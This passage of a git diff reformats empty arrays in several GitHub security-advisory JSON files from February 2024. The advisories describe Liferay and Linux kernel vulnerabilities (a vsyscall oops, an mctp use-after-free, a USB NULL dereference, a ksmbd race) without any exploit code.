"references": [
{
"type": "ADVISORY",
@@ -52,9 +48,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-jwwf-c2fg-p2mq/GHSA-jwwf-c2fg-p2mq.json b/advisories/unreviewed/2024/02/GHSA-jwwf-c2fg-p2mq/GHSA-jwwf-c2fg-p2mq.json
index ab3e0ccd817..cb6ff3b1e86 100644
--- a/advisories/unreviewed/2024/02/GHSA-jwwf-c2fg-p2mq/GHSA-jwwf-c2fg-p2mq.json
+++ b/advisories/unreviewed/2024/02/GHSA-jwwf-c2fg-p2mq/GHSA-jwwf-c2fg-p2mq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-jxjp-cv56-m425/GHSA-jxjp-cv56-m425.json b/advisories/unreviewed/2024/02/GHSA-jxjp-cv56-m425/GHSA-jxjp-cv56-m425.json
index 24343bc55a7..4fb51a23c74 100644
--- a/advisories/unreviewed/2024/02/GHSA-jxjp-cv56-m425/GHSA-jxjp-cv56-m425.json
+++ b/advisories/unreviewed/2024/02/GHSA-jxjp-cv56-m425/GHSA-jxjp-cv56-m425.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-mc8m-4r3w-q2hw/GHSA-mc8m-4r3w-q2hw.json b/advisories/unreviewed/2024/02/GHSA-mc8m-4r3w-q2hw/GHSA-mc8m-4r3w-q2hw.json
index b9c9a79c777..603218d7584 100644
--- a/advisories/unreviewed/2024/02/GHSA-mc8m-4r3w-q2hw/GHSA-mc8m-4r3w-q2hw.json
+++ b/advisories/unreviewed/2024/02/GHSA-mc8m-4r3w-q2hw/GHSA-mc8m-4r3w-q2hw.json
@@ -7,12 +7,8 @@
"CVE-2022-45320"
],
"details": "Liferay Portal before 7.4.3.16 and Liferay DXP before 7.2 fix pack 19, 7.3 before update 6, and 7.4 before update 16 allow remote authenticated users to become the owner of a wiki page by editing the wiki page.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-mf8h-grfg-j9j3/GHSA-mf8h-grfg-j9j3.json b/advisories/unreviewed/2024/02/GHSA-mf8h-grfg-j9j3/GHSA-mf8h-grfg-j9j3.json
index ed7ff3e5b78..0b28e29a145 100644
--- a/advisories/unreviewed/2024/02/GHSA-mf8h-grfg-j9j3/GHSA-mf8h-grfg-j9j3.json
+++ b/advisories/unreviewed/2024/02/GHSA-mf8h-grfg-j9j3/GHSA-mf8h-grfg-j9j3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-mw6g-mf3x-8xg2/GHSA-mw6g-mf3x-8xg2.json b/advisories/unreviewed/2024/02/GHSA-mw6g-mf3x-8xg2/GHSA-mw6g-mf3x-8xg2.json
index 520a6d983d8..4a4c2eea334 100644
--- a/advisories/unreviewed/2024/02/GHSA-mw6g-mf3x-8xg2/GHSA-mw6g-mf3x-8xg2.json
+++ b/advisories/unreviewed/2024/02/GHSA-mw6g-mf3x-8xg2/GHSA-mw6g-mf3x-8xg2.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-mwhj-qw9v-2hj2/GHSA-mwhj-qw9v-2hj2.json b/advisories/unreviewed/2024/02/GHSA-mwhj-qw9v-2hj2/GHSA-mwhj-qw9v-2hj2.json
index d7d8ff43e6e..841ed2813ea 100644
--- a/advisories/unreviewed/2024/02/GHSA-mwhj-qw9v-2hj2/GHSA-mwhj-qw9v-2hj2.json
+++ b/advisories/unreviewed/2024/02/GHSA-mwhj-qw9v-2hj2/GHSA-mwhj-qw9v-2hj2.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-p6q6-7q65-mgx6/GHSA-p6q6-7q65-mgx6.json b/advisories/unreviewed/2024/02/GHSA-p6q6-7q65-mgx6/GHSA-p6q6-7q65-mgx6.json
index 2ec8f6e0358..4c7ae67c80d 100644
--- a/advisories/unreviewed/2024/02/GHSA-p6q6-7q65-mgx6/GHSA-p6q6-7q65-mgx6.json
+++ b/advisories/unreviewed/2024/02/GHSA-p6q6-7q65-mgx6/GHSA-p6q6-7q65-mgx6.json
@@ -7,12 +7,8 @@
"CVE-2023-52476"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86/lbr: Filter vsyscall addresses\n\nWe found that a panic can occur when a vsyscall is made while LBR sampling\nis active. If the vsyscall is interrupted (NMI) for perf sampling, this\ncall sequence can occur (most recent at top):\n\n __insn_get_emulate_prefix()\n insn_get_emulate_prefix()\n insn_get_prefixes()\n insn_get_opcode()\n decode_branch_type()\n get_branch_type()\n intel_pmu_lbr_filter()\n intel_pmu_handle_irq()\n perf_event_nmi_handler()\n\nWithin __insn_get_emulate_prefix() at frame 0, a macro is called:\n\n peek_nbyte_next(insn_byte_t, insn, i)\n\nWithin this macro, this dereference occurs:\n\n (insn)->next_byte\n\nInspecting registers at this point, the value of the next_byte field is the\naddress of the vsyscall made, for example the location of the vsyscall\nversion of gettimeofday() at 0xffffffffff600000. The access to an address\nin the vsyscall region will trigger an oops due to an unhandled page fault.\n\nTo fix the bug, filtering for vsyscalls can be done when\ndetermining the branch type. This patch will return\na \"none\" branch if a kernel address if found to lie in the\nvsyscall region.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -36,9 +32,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-p7f2-66rr-gm45/GHSA-p7f2-66rr-gm45.json b/advisories/unreviewed/2024/02/GHSA-p7f2-66rr-gm45/GHSA-p7f2-66rr-gm45.json
index 467a22b96a5..62a0126883f 100644
--- a/advisories/unreviewed/2024/02/GHSA-p7f2-66rr-gm45/GHSA-p7f2-66rr-gm45.json
+++ b/advisories/unreviewed/2024/02/GHSA-p7f2-66rr-gm45/GHSA-p7f2-66rr-gm45.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-p86v-jh7g-5x8q/GHSA-p86v-jh7g-5x8q.json b/advisories/unreviewed/2024/02/GHSA-p86v-jh7g-5x8q/GHSA-p86v-jh7g-5x8q.json
index e8e7025c5c3..d25ba8d68ee 100644
--- a/advisories/unreviewed/2024/02/GHSA-p86v-jh7g-5x8q/GHSA-p86v-jh7g-5x8q.json
+++ b/advisories/unreviewed/2024/02/GHSA-p86v-jh7g-5x8q/GHSA-p86v-jh7g-5x8q.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-p8h7-jc93-wgq3/GHSA-p8h7-jc93-wgq3.json b/advisories/unreviewed/2024/02/GHSA-p8h7-jc93-wgq3/GHSA-p8h7-jc93-wgq3.json
index ac4c2b2beb7..8eb1d23db81 100644
--- a/advisories/unreviewed/2024/02/GHSA-p8h7-jc93-wgq3/GHSA-p8h7-jc93-wgq3.json
+++ b/advisories/unreviewed/2024/02/GHSA-p8h7-jc93-wgq3/GHSA-p8h7-jc93-wgq3.json
@@ -7,12 +7,8 @@
"CVE-2023-52483"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmctp: perform route lookups under a RCU read-side lock\n\nOur current route lookups (mctp_route_lookup and mctp_route_lookup_null)\ntraverse the net's route list without the RCU read lock held. This means\nthe route lookup is subject to preemption, resulting in an potential\ngrace period expiry, and so an eventual kfree() while we still have the\nroute pointer.\n\nAdd the proper read-side critical section locks around the route\nlookups, preventing premption and a possible parallel kfree.\n\nThe remaining net->mctp.routes accesses are already under a\nrcu_read_lock, or protected by the RTNL for updates.\n\nBased on an analysis from Sili Luo , where\nintroducing a delay in the route lookup could cause a UAF on\nsimultaneous sendmsg() and route deletion.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -36,9 +32,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-pg9j-xv4w-ppqv/GHSA-pg9j-xv4w-ppqv.json b/advisories/unreviewed/2024/02/GHSA-pg9j-xv4w-ppqv/GHSA-pg9j-xv4w-ppqv.json
index 7b64eb35049..9ee01e5a633 100644
--- a/advisories/unreviewed/2024/02/GHSA-pg9j-xv4w-ppqv/GHSA-pg9j-xv4w-ppqv.json
+++ b/advisories/unreviewed/2024/02/GHSA-pg9j-xv4w-ppqv/GHSA-pg9j-xv4w-ppqv.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-phfx-2gmw-mfx5/GHSA-phfx-2gmw-mfx5.json b/advisories/unreviewed/2024/02/GHSA-phfx-2gmw-mfx5/GHSA-phfx-2gmw-mfx5.json
index bacdfd0f631..975aadd26a1 100644
--- a/advisories/unreviewed/2024/02/GHSA-phfx-2gmw-mfx5/GHSA-phfx-2gmw-mfx5.json
+++ b/advisories/unreviewed/2024/02/GHSA-phfx-2gmw-mfx5/GHSA-phfx-2gmw-mfx5.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-pm76-25c2-x352/GHSA-pm76-25c2-x352.json b/advisories/unreviewed/2024/02/GHSA-pm76-25c2-x352/GHSA-pm76-25c2-x352.json
index 324566cc54a..1e5f3d83c3c 100644
--- a/advisories/unreviewed/2024/02/GHSA-pm76-25c2-x352/GHSA-pm76-25c2-x352.json
+++ b/advisories/unreviewed/2024/02/GHSA-pm76-25c2-x352/GHSA-pm76-25c2-x352.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-pp5p-pf9f-v3q8/GHSA-pp5p-pf9f-v3q8.json b/advisories/unreviewed/2024/02/GHSA-pp5p-pf9f-v3q8/GHSA-pp5p-pf9f-v3q8.json
index fcfe6343001..c88c3f710d0 100644
--- a/advisories/unreviewed/2024/02/GHSA-pp5p-pf9f-v3q8/GHSA-pp5p-pf9f-v3q8.json
+++ b/advisories/unreviewed/2024/02/GHSA-pp5p-pf9f-v3q8/GHSA-pp5p-pf9f-v3q8.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-pqjc-g576-r2pc/GHSA-pqjc-g576-r2pc.json b/advisories/unreviewed/2024/02/GHSA-pqjc-g576-r2pc/GHSA-pqjc-g576-r2pc.json
index 77d2192d2b9..30d7023c1c9 100644
--- a/advisories/unreviewed/2024/02/GHSA-pqjc-g576-r2pc/GHSA-pqjc-g576-r2pc.json
+++ b/advisories/unreviewed/2024/02/GHSA-pqjc-g576-r2pc/GHSA-pqjc-g576-r2pc.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-pw7p-3648-qqmg/GHSA-pw7p-3648-qqmg.json b/advisories/unreviewed/2024/02/GHSA-pw7p-3648-qqmg/GHSA-pw7p-3648-qqmg.json
index ab990601314..3039c0b398a 100644
--- a/advisories/unreviewed/2024/02/GHSA-pw7p-3648-qqmg/GHSA-pw7p-3648-qqmg.json
+++ b/advisories/unreviewed/2024/02/GHSA-pw7p-3648-qqmg/GHSA-pw7p-3648-qqmg.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-q55v-xrhh-mmwj/GHSA-q55v-xrhh-mmwj.json b/advisories/unreviewed/2024/02/GHSA-q55v-xrhh-mmwj/GHSA-q55v-xrhh-mmwj.json
index cc2dd130e73..c5fb6d1a270 100644
--- a/advisories/unreviewed/2024/02/GHSA-q55v-xrhh-mmwj/GHSA-q55v-xrhh-mmwj.json
+++ b/advisories/unreviewed/2024/02/GHSA-q55v-xrhh-mmwj/GHSA-q55v-xrhh-mmwj.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-q5wf-j98c-fr46/GHSA-q5wf-j98c-fr46.json b/advisories/unreviewed/2024/02/GHSA-q5wf-j98c-fr46/GHSA-q5wf-j98c-fr46.json
index 60a8abdb48f..78d55e6bbdf 100644
--- a/advisories/unreviewed/2024/02/GHSA-q5wf-j98c-fr46/GHSA-q5wf-j98c-fr46.json
+++ b/advisories/unreviewed/2024/02/GHSA-q5wf-j98c-fr46/GHSA-q5wf-j98c-fr46.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-q769-33w3-x2hh/GHSA-q769-33w3-x2hh.json b/advisories/unreviewed/2024/02/GHSA-q769-33w3-x2hh/GHSA-q769-33w3-x2hh.json
index c08b252b701..e5ad17a0a78 100644
--- a/advisories/unreviewed/2024/02/GHSA-q769-33w3-x2hh/GHSA-q769-33w3-x2hh.json
+++ b/advisories/unreviewed/2024/02/GHSA-q769-33w3-x2hh/GHSA-q769-33w3-x2hh.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-q8g6-6p5x-cv9v/GHSA-q8g6-6p5x-cv9v.json b/advisories/unreviewed/2024/02/GHSA-q8g6-6p5x-cv9v/GHSA-q8g6-6p5x-cv9v.json
index 20de2746d68..1b5a3bac606 100644
--- a/advisories/unreviewed/2024/02/GHSA-q8g6-6p5x-cv9v/GHSA-q8g6-6p5x-cv9v.json
+++ b/advisories/unreviewed/2024/02/GHSA-q8g6-6p5x-cv9v/GHSA-q8g6-6p5x-cv9v.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-q8rx-w8h7-j8xw/GHSA-q8rx-w8h7-j8xw.json b/advisories/unreviewed/2024/02/GHSA-q8rx-w8h7-j8xw/GHSA-q8rx-w8h7-j8xw.json
index cd24a8fb246..2e724a9e968 100644
--- a/advisories/unreviewed/2024/02/GHSA-q8rx-w8h7-j8xw/GHSA-q8rx-w8h7-j8xw.json
+++ b/advisories/unreviewed/2024/02/GHSA-q8rx-w8h7-j8xw/GHSA-q8rx-w8h7-j8xw.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-qc2v-frq4-w9pj/GHSA-qc2v-frq4-w9pj.json b/advisories/unreviewed/2024/02/GHSA-qc2v-frq4-w9pj/GHSA-qc2v-frq4-w9pj.json
index 7a9088ebb86..eb157bbf773 100644
--- a/advisories/unreviewed/2024/02/GHSA-qc2v-frq4-w9pj/GHSA-qc2v-frq4-w9pj.json
+++ b/advisories/unreviewed/2024/02/GHSA-qc2v-frq4-w9pj/GHSA-qc2v-frq4-w9pj.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-qfm6-2jf8-7v9r/GHSA-qfm6-2jf8-7v9r.json b/advisories/unreviewed/2024/02/GHSA-qfm6-2jf8-7v9r/GHSA-qfm6-2jf8-7v9r.json
index e57baadfc69..36303fa5a21 100644
--- a/advisories/unreviewed/2024/02/GHSA-qfm6-2jf8-7v9r/GHSA-qfm6-2jf8-7v9r.json
+++ b/advisories/unreviewed/2024/02/GHSA-qfm6-2jf8-7v9r/GHSA-qfm6-2jf8-7v9r.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-qfrv-fmc5-hmmh/GHSA-qfrv-fmc5-hmmh.json b/advisories/unreviewed/2024/02/GHSA-qfrv-fmc5-hmmh/GHSA-qfrv-fmc5-hmmh.json
index aa392fc87da..674f0e78bd8 100644
--- a/advisories/unreviewed/2024/02/GHSA-qfrv-fmc5-hmmh/GHSA-qfrv-fmc5-hmmh.json
+++ b/advisories/unreviewed/2024/02/GHSA-qfrv-fmc5-hmmh/GHSA-qfrv-fmc5-hmmh.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-qm43-g2xj-hvg5/GHSA-qm43-g2xj-hvg5.json b/advisories/unreviewed/2024/02/GHSA-qm43-g2xj-hvg5/GHSA-qm43-g2xj-hvg5.json
index 2c715be5ad0..c4b8c726da1 100644
--- a/advisories/unreviewed/2024/02/GHSA-qm43-g2xj-hvg5/GHSA-qm43-g2xj-hvg5.json
+++ b/advisories/unreviewed/2024/02/GHSA-qm43-g2xj-hvg5/GHSA-qm43-g2xj-hvg5.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-qp5h-6h76-j5w8/GHSA-qp5h-6h76-j5w8.json b/advisories/unreviewed/2024/02/GHSA-qp5h-6h76-j5w8/GHSA-qp5h-6h76-j5w8.json
index 9ffe90e7de2..6f1aea47559 100644
--- a/advisories/unreviewed/2024/02/GHSA-qp5h-6h76-j5w8/GHSA-qp5h-6h76-j5w8.json
+++ b/advisories/unreviewed/2024/02/GHSA-qp5h-6h76-j5w8/GHSA-qp5h-6h76-j5w8.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-qpgh-6v9w-vfv6/GHSA-qpgh-6v9w-vfv6.json b/advisories/unreviewed/2024/02/GHSA-qpgh-6v9w-vfv6/GHSA-qpgh-6v9w-vfv6.json
index 535739270f5..9605f2abf7c 100644
--- a/advisories/unreviewed/2024/02/GHSA-qpgh-6v9w-vfv6/GHSA-qpgh-6v9w-vfv6.json
+++ b/advisories/unreviewed/2024/02/GHSA-qpgh-6v9w-vfv6/GHSA-qpgh-6v9w-vfv6.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-qpgx-27pf-wq3j/GHSA-qpgx-27pf-wq3j.json b/advisories/unreviewed/2024/02/GHSA-qpgx-27pf-wq3j/GHSA-qpgx-27pf-wq3j.json
index 2652a8b4224..1f60d7191ae 100644
--- a/advisories/unreviewed/2024/02/GHSA-qpgx-27pf-wq3j/GHSA-qpgx-27pf-wq3j.json
+++ b/advisories/unreviewed/2024/02/GHSA-qpgx-27pf-wq3j/GHSA-qpgx-27pf-wq3j.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-qv48-h28r-v6rp/GHSA-qv48-h28r-v6rp.json b/advisories/unreviewed/2024/02/GHSA-qv48-h28r-v6rp/GHSA-qv48-h28r-v6rp.json
index a22152b6dd5..9d5b159206f 100644
--- a/advisories/unreviewed/2024/02/GHSA-qv48-h28r-v6rp/GHSA-qv48-h28r-v6rp.json
+++ b/advisories/unreviewed/2024/02/GHSA-qv48-h28r-v6rp/GHSA-qv48-h28r-v6rp.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-qw42-c97g-78x6/GHSA-qw42-c97g-78x6.json b/advisories/unreviewed/2024/02/GHSA-qw42-c97g-78x6/GHSA-qw42-c97g-78x6.json
index fb4d9001aef..34b0b844740 100644
--- a/advisories/unreviewed/2024/02/GHSA-qw42-c97g-78x6/GHSA-qw42-c97g-78x6.json
+++ b/advisories/unreviewed/2024/02/GHSA-qw42-c97g-78x6/GHSA-qw42-c97g-78x6.json
@@ -7,12 +7,8 @@
"CVE-2023-52477"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: hub: Guard against accesses to uninitialized BOS descriptors\n\nMany functions in drivers/usb/core/hub.c and drivers/usb/core/hub.h\naccess fields inside udev->bos without checking if it was allocated and\ninitialized. If usb_get_bos_descriptor() fails for whatever\nreason, udev->bos will be NULL and those accesses will result in a\ncrash:\n\nBUG: kernel NULL pointer dereference, address: 0000000000000018\nPGD 0 P4D 0\nOops: 0000 [#1] PREEMPT SMP NOPTI\nCPU: 5 PID: 17818 Comm: kworker/5:1 Tainted: G W 5.15.108-18910-gab0e1cb584e1 #1 \nHardware name: Google Kindred/Kindred, BIOS Google_Kindred.12672.413.0 02/03/2021\nWorkqueue: usb_hub_wq hub_event\nRIP: 0010:hub_port_reset+0x193/0x788\nCode: 89 f7 e8 20 f7 15 00 48 8b 43 08 80 b8 96 03 00 00 03 75 36 0f b7 88 92 03 00 00 81 f9 10 03 00 00 72 27 48 8b 80 a8 03 00 00 <48> 83 78 18 00 74 19 48 89 df 48 8b 75 b0 ba 02 00 00 00 4c 89 e9\nRSP: 0018:ffffab740c53fcf8 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: ffffa1bc5f678000 RCX: 0000000000000310\nRDX: fffffffffffffdff RSI: 0000000000000286 RDI: ffffa1be9655b840\nRBP: ffffab740c53fd70 R08: 00001b7d5edaa20c R09: ffffffffb005e060\nR10: 0000000000000001 R11: 0000000000000000 R12: 0000000000000000\nR13: ffffab740c53fd3e R14: 0000000000000032 R15: 0000000000000000\nFS: 0000000000000000(0000) GS:ffffa1be96540000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000018 CR3: 000000022e80c005 CR4: 00000000003706e0\nCall Trace:\nhub_event+0x73f/0x156e\n? hub_activate+0x5b7/0x68f\nprocess_one_work+0x1a2/0x487\nworker_thread+0x11a/0x288\nkthread+0x13a/0x152\n? process_one_work+0x487/0x487\n? kthread_associate_blkcg+0x70/0x70\nret_from_fork+0x1f/0x30\n\nFall back to a default behavior if the BOS descriptor isn't accessible\nand skip all the functionalities that depend on it: LPM support checks,\nSuper Speed capabilitiy checks, U1/U2 states setup.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -52,9 +48,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-r2c3-2vcp-2qx5/GHSA-r2c3-2vcp-2qx5.json b/advisories/unreviewed/2024/02/GHSA-r2c3-2vcp-2qx5/GHSA-r2c3-2vcp-2qx5.json
index a69a808472e..544f93b28a8 100644
--- a/advisories/unreviewed/2024/02/GHSA-r2c3-2vcp-2qx5/GHSA-r2c3-2vcp-2qx5.json
+++ b/advisories/unreviewed/2024/02/GHSA-r2c3-2vcp-2qx5/GHSA-r2c3-2vcp-2qx5.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-rwrp-rr8g-cg9q/GHSA-rwrp-rr8g-cg9q.json b/advisories/unreviewed/2024/02/GHSA-rwrp-rr8g-cg9q/GHSA-rwrp-rr8g-cg9q.json
index 06c4ff10e18..0a08930b3af 100644
--- a/advisories/unreviewed/2024/02/GHSA-rwrp-rr8g-cg9q/GHSA-rwrp-rr8g-cg9q.json
+++ b/advisories/unreviewed/2024/02/GHSA-rwrp-rr8g-cg9q/GHSA-rwrp-rr8g-cg9q.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-v2j2-ph6r-wrg9/GHSA-v2j2-ph6r-wrg9.json b/advisories/unreviewed/2024/02/GHSA-v2j2-ph6r-wrg9/GHSA-v2j2-ph6r-wrg9.json
index e02297df5a0..41dcc514881 100644
--- a/advisories/unreviewed/2024/02/GHSA-v2j2-ph6r-wrg9/GHSA-v2j2-ph6r-wrg9.json
+++ b/advisories/unreviewed/2024/02/GHSA-v2j2-ph6r-wrg9/GHSA-v2j2-ph6r-wrg9.json
@@ -7,12 +7,8 @@
"CVE-2023-52480"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: fix race condition between session lookup and expire\n\n Thread A + Thread B\n ksmbd_session_lookup | smb2_sess_setup\n sess = xa_load |\n |\n | xa_erase(&conn->sessions, sess->id);\n |\n | ksmbd_session_destroy(sess) --> kfree(sess)\n |\n // UAF! |\n sess->last_active = jiffies |\n +\n\nThis patch add rwsem to fix race condition between ksmbd_session_lookup\nand ksmbd_expire_session.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
